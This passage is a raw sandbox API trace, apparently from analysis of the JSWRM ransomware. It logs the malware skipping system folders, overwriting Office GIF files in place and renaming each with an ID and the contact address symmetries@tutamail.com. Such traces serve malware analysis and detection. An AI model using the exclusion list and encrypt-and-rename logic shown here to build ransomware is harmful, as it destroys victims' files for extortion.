hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0120.501] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.501] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0120.501] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR39F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir39f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.502] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=56474) returned 1 [0120.502] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xdc90) returned 0x24e1d8 [0120.502] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xdc90, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0xdc90, lpOverlapped=0x0) returned 1 [0120.506] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.506] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xdc90, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0xdc90, lpOverlapped=0x0) returned 1 [0120.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.507] CloseHandle (hObject=0x314) returned 1 [0120.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0120.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0120.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0120.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0120.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0120.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0120.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0120.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0120.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0120.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0120.507] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR39F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir39f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR39F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir39f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0120.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0120.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0120.508] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae23ccd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae23ccd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae23ccd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3a1e, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR3B.GIF", cAlternateFileName="")) returned 1 [0120.508] lstrcmpiW (lpString1="ZPDIR3B.GIF", lpString2=".") returned 1 [0120.508] lstrcmpiW (lpString1="ZPDIR3B.GIF", lpString2="..") returned 1 [0120.508] lstrcmpiW (lpString1="ZPDIR3B.GIF", lpString2="...") returned 1 [0120.508] lstrcmpiW (lpString1="ZPDIR3B.GIF", lpString2="windows") returned 1 [0120.508] lstrcmpiW (lpString1="ZPDIR3B.GIF", lpString2="recovery") returned 1 [0120.508] lstrcmpiW (lpString1="ZPDIR3B.GIF", lpString2="perflogs") returned 1 [0120.508] lstrcmpiW (lpString1="ZPDIR3B.GIF", lpString2="documents and settings") returned 1 [0120.509] lstrcmpiW (lpString1="ZPDIR3B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.509] lstrcmpiW (lpString1="ZPDIR3B.GIF", lpString2="system volume information") returned 1 [0120.509] lstrcmpiW (lpString1="ZPDIR3B.GIF", lpString2="msocache") returned 1 [0120.509] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0120.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR3B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR3B.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR3B.GIF", lpUsedDefaultChar=0x0) returned 11 [0120.509] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0120.509] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0120.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR3B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR3B.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR3B.GIF", lpUsedDefaultChar=0x0) returned 11 [0120.509] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0120.509] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0120.509] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0120.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.509] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0120.509] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR3B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir3b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.510] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=14878) returned 1 [0120.510] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.510] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3a10) returned 0x24e1d8 [0120.510] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x3a10, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x3a10, lpOverlapped=0x0) returned 1 [0120.512] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.512] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x3a10, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x3a10, lpOverlapped=0x0) returned 1 [0120.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.512] CloseHandle (hObject=0x314) returned 1 [0120.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0120.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0120.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0120.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0120.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0120.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0120.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0120.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0120.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0120.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0120.512] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR3B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir3b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR3B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir3b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0120.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0120.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0120.513] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae49f22, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae49f22, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae49f22, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x58e2, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR3F.GIF", cAlternateFileName="")) returned 1 [0120.513] lstrcmpiW (lpString1="ZPDIR3F.GIF", lpString2=".") returned 1 [0120.513] lstrcmpiW (lpString1="ZPDIR3F.GIF", lpString2="..") returned 1 [0120.513] lstrcmpiW (lpString1="ZPDIR3F.GIF", lpString2="...") returned 1 [0120.513] lstrcmpiW (lpString1="ZPDIR3F.GIF", lpString2="windows") returned 1 [0120.513] lstrcmpiW (lpString1="ZPDIR3F.GIF", lpString2="recovery") returned 1 [0120.513] lstrcmpiW (lpString1="ZPDIR3F.GIF", lpString2="perflogs") returned 1 [0120.513] lstrcmpiW (lpString1="ZPDIR3F.GIF", lpString2="documents and settings") returned 1 [0120.514] lstrcmpiW (lpString1="ZPDIR3F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.514] lstrcmpiW (lpString1="ZPDIR3F.GIF", lpString2="system volume information") returned 1 [0120.514] lstrcmpiW (lpString1="ZPDIR3F.GIF", lpString2="msocache") returned 1 [0120.514] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0120.514] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR3F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.514] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR3F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR3F.GIF", lpUsedDefaultChar=0x0) returned 11 [0120.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0120.514] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0120.514] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR3F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.514] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR3F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR3F.GIF", lpUsedDefaultChar=0x0) returned 11 [0120.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0120.514] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0120.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0120.514] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.514] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.514] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0120.514] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR3F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir3f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.516] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=22754) returned 1 [0120.516] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.516] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x58e0) returned 0x24e1d8 [0120.516] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x58e0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x58e0, lpOverlapped=0x0) returned 1 [0120.519] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.519] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x58e0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x58e0, lpOverlapped=0x0) returned 1 [0120.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.519] CloseHandle (hObject=0x314) returned 1 [0120.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0120.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0120.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0120.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0120.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0120.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0120.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0120.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0120.519] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR3F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir3f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR3F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir3f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0120.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0120.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0120.520] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadfda74, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadfda74, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadfda74, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x112a3, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR40F.GIF", cAlternateFileName="")) returned 1 [0120.520] lstrcmpiW (lpString1="ZPDIR40F.GIF", lpString2=".") returned 1 [0120.520] lstrcmpiW (lpString1="ZPDIR40F.GIF", lpString2="..") returned 1 [0120.520] lstrcmpiW (lpString1="ZPDIR40F.GIF", lpString2="...") returned 1 [0120.520] lstrcmpiW (lpString1="ZPDIR40F.GIF", lpString2="windows") returned 1 [0120.520] lstrcmpiW (lpString1="ZPDIR40F.GIF", lpString2="recovery") returned 1 [0120.520] lstrcmpiW (lpString1="ZPDIR40F.GIF", lpString2="perflogs") returned 1 [0120.521] lstrcmpiW (lpString1="ZPDIR40F.GIF", lpString2="documents and settings") returned 1 [0120.521] lstrcmpiW (lpString1="ZPDIR40F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.521] lstrcmpiW (lpString1="ZPDIR40F.GIF", lpString2="system volume information") returned 1 [0120.521] lstrcmpiW (lpString1="ZPDIR40F.GIF", lpString2="msocache") returned 1 [0120.521] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0120.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR40F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR40F.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR40F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.521] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0120.521] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0120.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR40F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR40F.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR40F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.521] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0120.521] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0120.521] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0120.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.521] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.521] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0120.521] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR40F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir40f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.522] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=70307) returned 1 [0120.522] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.522] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x112a0) returned 0x24e1d8 [0120.522] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x112a0, 